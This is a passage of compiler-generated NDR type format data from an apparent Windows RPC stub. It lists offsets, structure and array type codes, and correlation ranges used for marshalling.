/* 476 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 478 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 480 */	NdrFcLong( 0x0 ),	/* 0 */
/* 484 */	NdrFcLong( 0x100000 ),	/* 1048576 */
/* 488 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 490 */	NdrFcShort( 0xffe0 ),	/* Offset= -32 (458) */
/* 492 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 494 */
			0x17,		/* FC_CSTRUCT */
			0x7,		/* 7 */
/* 496 */	NdrFcShort( 0x10 ),	/* 16 */
/* 498 */	NdrFcShort( 0xffe2 ),	/* Offset= -30 (468) */
/* 500 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 502 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 504 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 506 */
			0x1b,		/* FC_CARRAY */
			0x3,		/* 3 */
/* 508 */	NdrFcShort( 0x4 ),	/* 4 */
/* 510 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 512 */	NdrFcShort( 0xfffc ),	/* -4 */
/* 514 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 516 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 518 */	NdrFcLong( 0x1 ),	/* 1 */
/* 522 */	NdrFcLong( 0x100000 ),	/* 1048576 */
/* 526 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 528 */
			0x17,		/* FC_CSTRUCT */
			0x3,		/* 3 */
/* 530 */	NdrFcShort( 0xc ),	/* 12 */
/* 532 */	NdrFcShort( 0xffe6 ),	/* Offset= -26 (506) */
/* 534 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 536 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 538 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 540 */	NdrFcShort( 0x70 ),	/* 112 */
/* 542 */	NdrFcShort( 0x0 ),	/* 0 */
/* 544 */	NdrFcShort( 0x1a ),	/* Offset= 26 (570) */
/* 546 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 548 */	NdrFcShort( 0xfde8 ),	/* Offset= -536 (12) */
/* 550 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 552 */	NdrFcShort( 0xfde4 ),	/* Offset= -540 (12) */
/* 554 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 556 */	0x0,		/* 0 */
			NdrFcShort( 0xff25 ),	/* Offset= -219 (338) */
			0x36,		/* FC_POINTER */
/* 560 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 562 */	0x0,		/* 0 */
			NdrFcShort( 0xff87 ),	/* Offset= -121 (442) */
			0x8,		/* FC_LONG */
/* 566 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 568 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 570 */
			0x11, 0x0,	/* FC_RP */
/* 572 */	NdrFcShort( 0xfe66 ),	/* Offset= -410 (162) */
/* 574 */
			0x12, 0x0,	/* FC_UP */
/* 576 */	NdrFcShort( 0xffae ),	/* Offset= -82 (494) */
/* 578 */
			0x12, 0x0,	/* FC_UP */
/* 580 */	NdrFcShort( 0xffcc ),	/* Offset= -52 (528) */
/* 582 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 584 */	NdrFcShort( 0x1 ),	/* 1 */
/* 586 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 588 */	NdrFcShort( 0xfffc ),	/* -4 */
/* 590 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 592 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 594 */	NdrFcLong( 0x1 ),	/* 1 */
/* 598 */	NdrFcLong( 0x100 ),	/* 256 */
/* 602 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 604 */
			0x17,		/* FC_CSTRUCT */
			0x3,		/* 3 */
/* 606 */	NdrFcShort( 0x4 ),	/* 4 */
/* 608 */	NdrFcShort( 0xffe6 ),	/* Offset= -26 (582) */
/* 610 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 612 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 614 */	NdrFcShort( 0x88 ),	/* 136 */
/* 616 */	NdrFcShort( 0x0 ),	/* 0 */
/* 618 */	NdrFcShort( 0xc ),	/* Offset= 12 (630) */
/* 620 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 622 */	NdrFcShort( 0xfd9e ),	/* Offset= -610 (12) */
/* 624 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 626 */	0x0,		/* 0 */
			NdrFcShort( 0xffa7 ),	/* Offset= -89 (538) */
			0x5b,		/* FC_END */
/* 630 */
			0x11, 0x0,	/* FC_RP */
/* 632 */	NdrFcShort( 0xffe4 ),	/* Offset= -28 (604) */
/* 634 */
			0x15,		/* FC_STRUCT */
			0x7,		/* 7 */
/* 636 */	NdrFcShort( 0x8 ),	/* 8 */
/* 638 */	0xb,		/* FC_HYPER */
			0x5b,		/* FC_END */
/* 640 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 642 */	NdrFcShort( 0x60 ),	/* 96 */
/* 644 */	NdrFcShort( 0x0 ),	/* 0 */
/* 646 */	NdrFcShort( 0x1a ),	/* Offset= 26 (672) */
/* 648 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 650 */	NdrFcShort( 0xfd82 ),	/* Offset= -638 (12) */
/* 652 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 654 */	NdrFcShort( 0xfd7e ),	/* Offset= -642 (12) */
/* 656 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 658 */	0x0,		/* 0 */
			NdrFcShort( 0xfebf ),	/* Offset= -321 (338) */
			0x36,		/* FC_POINTER */
/* 662 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 664 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 666 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 668 */	NdrFcShort( 0xffde ),	/* Offset= -34 (634) */
/* 670 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 672 */
			0x11, 0x0,	/* FC_RP */
/* 674 */	NdrFcShort( 0xfe00 ),	/* Offset= -512 (162) */
/* 676 */
			0x12, 0x0,	/* FC_UP */
/* 678 */	NdrFcShort( 0xff48 ),	/* Offset= -184 (494) */
/* 680 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 682 */	NdrFcShort( 0xa8 ),	/* 168 */
/* 684 */	NdrFcShort( 0x0 ),	/* 0 */
/* 686 */	NdrFcShort( 0x12 ),	/* Offset= 18 (704) */
/* 688 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 690 */	NdrFcShort( 0xfd5a ),	/* Offset= -678 (12) */
/* 692 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 694 */	0x0,		/* 0 */
			NdrFcShort( 0xff63 ),	/* Offset= -157 (538) */
			0x36,		/* FC_POINTER */
/* 698 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 700 */	0x0,		/* 0 */
			NdrFcShort( 0xfefd ),	/* Offset= -259 (442) */
			0x5b,		/* FC_END */
/* 704 */
			0x11, 0x0,	/* FC_RP */
/* 706 */	NdrFcShort( 0xff9a ),	/* Offset= -102 (604) */
/* 708 */
			0x12, 0x0,	/* FC_UP */
/* 710 */	NdrFcShort( 0xff4a ),	/* Offset= -182 (528) */
/* 712 */
			0x12, 0x0,	/* FC_UP */
/* 714 */	NdrFcShort( 0xff46 ),	/* Offset= -186 (528) */
/* 716 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 718 */	NdrFcShort( 0x80 ),	/* 128 */
/* 720 */	NdrFcShort( 0x0 ),	/* 0 */
/* 722 */	NdrFcShort( 0x20 ),	/* Offset= 32 (754) */
/* 724 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 726 */	NdrFcShort( 0xfd36 ),	/* Offset= -714 (12) */
/* 728 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 730 */	NdrFcShort( 0xfd32 ),	/* Offset= -718 (12) */
/* 732 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 734 */	0x0,		/* 0 */
			NdrFcShort( 0xfe73 ),	/* Offset= -397 (338) */
			0x36,		/* FC_POINTER */
/* 738 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 740 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 742 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 744 */	NdrFcShort( 0xff92 ),	/* Offset= -110 (634) */
/* 746 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 748 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 750 */	NdrFcShort( 0xfecc ),	/* Offset= -308 (442) */
/* 752 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 754 */
			0x11, 0x0,	/* FC_RP */
/* 756 */	NdrFcShort( 0xfdae ),	/* Offset= -594 (162) */
/* 758 */
			0x12, 0x0,	/* FC_UP */
/* 760 */	NdrFcShort( 0xfef6 ),	/* Offset= -266 (494) */
/* 762 */
			0x12, 0x0,	/* FC_UP */
/* 764 */	NdrFcShort( 0xff14 ),	/* Offset= -236 (528) */
/* 766 */
			0x12, 0x0,	/* FC_UP */
/* 768 */	NdrFcShort( 0xff10 ),	/* Offset= -240 (528) */
/* 770 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 772 */	NdrFcShort( 0x88 ),	/* 136 */
/* 774 */	NdrFcShort( 0x0 ),	/* 0 */
/* 776 */	NdrFcShort( 0x22 ),	/* Offset= 34 (810) */
/* 778 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 780 */	NdrFcShort( 0xfd00 ),	/* Offset= -768 (12) */
/* 782 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 784 */	NdrFcShort( 0xfcfc ),	/* Offset= -772 (12) */
/* 786 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 788 */	0x0,		/* 0 */
			NdrFcShort( 0xfe3d ),	/* Offset= -451 (338) */
			0x36,		/* FC_POINTER */
/* 792 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 794 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 796 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 798 */	NdrFcShort( 0xff5c ),	/* Offset= -164 (634) */
/* 800 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 802 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 804 */	NdrFcShort( 0xfe96 ),	/* Offset= -362 (442) */
/* 806 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 808 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 810 */
			0x11, 0x0,	/* FC_RP */
/* 812 */	NdrFcShort( 0xfd76 ),	/* Offset= -650 (162) */
/* 814 */
			0x12, 0x0,	/* FC_UP */
/* 816 */	NdrFcShort( 0xfebe ),	/* Offset= -322 (494) */
/* 818 */
			0x12, 0x0,	/* FC_UP */
/* 820 */	NdrFcShort( 0xfedc ),	/* Offset= -292 (528) */
/* 822 */
			0x12, 0x0,	/* FC_UP */
/* 824 */	NdrFcShort( 0xfed8 ),	/* Offset= -296 (528) */
/* 826 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 828 */	NdrFcShort( 0xa0 ),	/* 160 */
/* 830 */	NdrFcShort( 0x0 ),	/* 0 */
/* 832 */	NdrFcShort( 0x26 ),	/* Offset= 38 (870) */
/* 834 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 836 */	NdrFcShort( 0xfcc8 ),	/* Offset= -824 (12) */
/* 838 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 840 */	NdrFcShort( 0xfcc4 ),	/* Offset= -828 (12) */
/* 842 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 844 */	0x0,		/* 0 */
			NdrFcShort( 0xfe05 ),	/* Offset= -507 (338) */
			0x36,		/* FC_POINTER */
/* 848 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 850 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 852 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 854 */	NdrFcShort( 0xff24 ),	/* Offset= -220 (634) */
/* 856 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 858 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 860 */	NdrFcShort( 0xfe5e ),	/* Offset= -418 (442) */
/* 862 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 864 */	0x0,		/* 0 */
			NdrFcShort( 0xfcab ),	/* Offset= -853 (12) */
			0x40,		/* FC_STRUCTPAD4 */
/* 868 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 870 */
			0x11, 0x0,	/* FC_RP */
/* 872 */	NdrFcShort( 0xfd3a ),	/* Offset= -710 (162) */
/* 874 */
			0x12, 0x0,	/* FC_UP */
/* 876 */	NdrFcShort( 0xfe82 ),	/* Offset= -382 (494) */
/* 878 */
			0x12, 0x0,	/* FC_UP */
/* 880 */	NdrFcShort( 0xfea0 ),	/* Offset= -352 (528) */
/* 882 */
			0x12, 0x0,	/* FC_UP */
/* 884 */	NdrFcShort( 0xfe9c ),	/* Offset= -356 (528) */
/* 886 */
			0x12, 0x0,	/* FC_UP */
/* 888 */	NdrFcShort( 0xfd6c ),	/* Offset= -660 (228) */
/* 890 */
			0x11, 0xc,	/* FC_RP [alloced_on_stack] [simple_pointer] */
/* 892 */	0x8,		/* FC_LONG */
			0x5c,		/* FC_PAD */
/* 894 */
			0x11, 0x0,	/* FC_RP */
/* 896 */	NdrFcShort( 0x2 ),	/* Offset= 2 (898) */
/* 898 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 900 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 902 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 904 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 906 */	0x0 ,
			0x0,		/* 0 */
/* 908 */	NdrFcLong( 0x0 ),	/* 0 */
/* 912 */	NdrFcLong( 0x0 ),	/* 0 */
/* 916 */	NdrFcShort( 0x2 ),	/* Offset= 2 (918) */
/* 918 */	NdrFcShort( 0xa8 ),	/* 168 */
/* 920 */	NdrFcShort( 0x5 ),	/* 5 */
/* 922 */	NdrFcLong( 0x1 ),	/* 1 */
/* 926 */	NdrFcShort( 0x140 ),	/* Offset= 320 (1246) */
/* 928 */	NdrFcLong( 0x2 ),	/* 2 */
/* 932 */	NdrFcShort( 0x192 ),	/* Offset= 402 (1334) */
/* 934 */	NdrFcLong( 0x6 ),	/* 6 */
/* 938 */	NdrFcShort( 0x21e ),	/* Offset= 542 (1480) */
/* 940 */	NdrFcLong( 0x7 ),	/* 7 */
/* 944 */	NdrFcShort( 0x254 ),	/* Offset= 596 (1540) */
/* 946 */	NdrFcLong( 0x9 ),	/* 9 */
/* 950 */	NdrFcShort( 0x2b6 ),	/* Offset= 694 (1644) */
/* 952 */	NdrFcShort( 0xffff ),	/* Offset= -1 (951) */
/* 954 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 956 */	NdrFcShort( 0x1 ),	/* 1 */
/* 958 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 960 */	NdrFcShort( 0x0 ),	/* 0 */
/* 962 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 964 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 966 */	NdrFcLong( 0x0 ),	/* 0 */
/* 970 */	NdrFcLong( 0x1900000 ),	/* 26214400 */
/* 974 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 976 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 978 */	NdrFcShort( 0x10 ),	/* 16 */
/* 980 */	NdrFcShort( 0x0 ),	/* 0 */
/* 982 */	NdrFcShort( 0x6 ),	/* Offset= 6 (988) */
/* 984 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 986 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 988 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 990 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (954) */
/* 992 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 994 */	NdrFcShort( 0x0 ),	/* 0 */
/* 996 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 998 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1000 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 1002 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 1004 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1008 */	NdrFcLong( 0xa00000 ),	/* 10485760 */
/* 1012 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 1016 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 1018 */	0x0 ,
			0x0,		/* 0 */
/* 1020 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1024 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1028 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1030 */	NdrFcShort( 0xffca ),	/* Offset= -54 (976) */
/* 1032 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1034 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1036 */	NdrFcShort( 0x10 ),	/* 16 */
/* 1038 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1040 */	NdrFcShort( 0x6 ),	/* Offset= 6 (1046) */
/* 1042 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1044 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 1046 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 1048 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (992) */
/* 1050 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1052 */	NdrFcShort( 0x18 ),	/* 24 */
/* 1054 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1056 */	NdrFcShort( 0x0 ),	/* Offset= 0 (1056) */
/* 1058 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1060 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1062 */	NdrFcShort( 0xffe4 ),	/* Offset= -28 (1034) */
/* 1064 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1066 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 1068 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1070 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 1072 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1074 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 1076 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 1078 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1082 */	NdrFcLong( 0x100000 ),	/* 1048576 */
/* 1086 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 1090 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 1092 */	0x0 ,
			0x0,		/* 0 */
/* 1094 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1098 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1102 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1104 */	NdrFcShort( 0xffca ),	/* Offset= -54 (1050) */
/* 1106 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1108 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1110 */	NdrFcShort( 0x10 ),	/* 16 */
/* 1112 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1114 */	NdrFcShort( 0x6 ),	/* Offset= 6 (1120) */
/* 1116 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1118 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 1120 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 1122 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (1066) */
/* 1124 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1126 */	NdrFcShort( 0x20 ),	/* 32 */
/* 1128 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1130 */	NdrFcShort( 0xa ),	/* Offset= 10 (1140) */
/* 1132 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 1134 */	0x40,		/* FC_STRUCTPAD4 */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1136 */	0x0,		/* 0 */
			NdrFcShort( 0xffe3 ),	/* Offset= -29 (1108) */
			0x5b,		/* FC_END */
/* 1140 */
			0x12, 0x0,	/* FC_UP */
/* 1142 */	NdrFcShort( 0xfc2c ),	/* Offset= -980 (162) */
/* 1144 */	0xb1,		/* FC_FORCED_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1146 */	NdrFcShort( 0x28 ),	/* 40 */
/* 1148 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1150 */	NdrFcShort( 0x0 ),	/* Offset= 0 (1150) */
/* 1152 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1154 */	0xb,		/* FC_HYPER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1156 */	0x0,		/* 0 */
			NdrFcShort( 0xfb87 ),	/* Offset= -1145 (12) */
			0xb,		/* FC_HYPER */
/* 1160 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1162 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 1164 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1166 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 1168 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 1170 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 1172 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 1174 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1178 */	NdrFcLong( 0x100000 ),	/* 1048576 */
/* 1182 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 1186 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 1188 */	0x0 ,
			0x0,		/* 0 */
/* 1190 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1194 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1198 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1200 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (1144) */
/* 1202 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1204 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1206 */	NdrFcShort( 0x8 ),	/* 8 */
/* 1208 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (1162) */
/* 1210 */	NdrFcShort( 0x0 ),	/* Offset= 0 (1210) */
/* 1212 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1214 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1216 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1218 */	NdrFcShort( 0x40 ),	/* 64 */
/* 1220 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1222 */	NdrFcShort( 0xc ),	/* Offset= 12 (1234) */
/* 1224 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1226 */	0x0,		/* 0 */
			NdrFcShort( 0xff99 ),	/* Offset= -103 (1124) */
			0x8,		/* FC_LONG */
/* 1230 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 1232 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 1234 */
			0x12, 0x0,	/* FC_UP */
/* 1236 */	NdrFcShort( 0xffec ),	/* Offset= -20 (1216) */
/* 1238 */
			0x12, 0x0,	/* FC_UP */
/* 1240 */	NdrFcShort( 0xfb34 ),	/* Offset= -1228 (12) */
/* 1242 */
			0x12, 0x0,	/* FC_UP */
/* 1244 */	NdrFcShort( 0xffd8 ),	/* Offset= -40 (1204) */
/* 1246 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1248 */	NdrFcShort( 0x90 ),	/* 144 */
/* 1250 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1252 */	NdrFcShort( 0x20 ),	/* Offset= 32 (1284) */
/* 1254 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1256 */	NdrFcShort( 0xfb24 ),	/* Offset= -1244 (12) */
/* 1258 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1260 */	NdrFcShort( 0xfb20 ),	/* Offset= -1248 (12) */
/* 1262 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1264 */	0x0,		/* 0 */
			NdrFcShort( 0xfc61 ),	/* Offset= -927 (338) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1268 */	0x0,		/* 0 */
			NdrFcShort( 0xfc5d ),	/* Offset= -931 (338) */
			0x36,		/* FC_POINTER */
/* 1272 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1274 */	NdrFcShort( 0xfcc0 ),	/* Offset= -832 (442) */
/* 1276 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1278 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1280 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 1282 */	0x40,		/* FC_STRUCTPAD4 */
			0x5b,		/* FC_END */
/* 1284 */
			0x12, 0x0,	/* FC_UP */
/* 1286 */	NdrFcShort( 0xfb9c ),	/* Offset= -1124 (162) */
/* 1288 */
			0x12, 0x0,	/* FC_UP */
/* 1290 */	NdrFcShort( 0xfce4 ),	/* Offset= -796 (494) */
/* 1292 */
			0x12, 0x0,	/* FC_UP */
/* 1294 */	NdrFcShort( 0xffb2 ),	/* Offset= -78 (1216) */
/* 1296 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 1298 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1300 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 1302 */	NdrFcShort( 0x4 ),	/* 4 */
/* 1304 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 1306 */	0x0 ,
			0x0,		/* 0 */
/* 1308 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1312 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1316 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 1318 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1320 */	NdrFcShort( 0x10 ),	/* 16 */
/* 1322 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1324 */	NdrFcShort( 0x6 ),	/* Offset= 6 (1330) */
/* 1326 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1328 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 1330 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 1332 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (1296) */
/* 1334 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1336 */	NdrFcShort( 0x10 ),	/* 16 */
/* 1338 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1340 */	NdrFcShort( 0x0 ),	/* Offset= 0 (1340) */
/* 1342 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
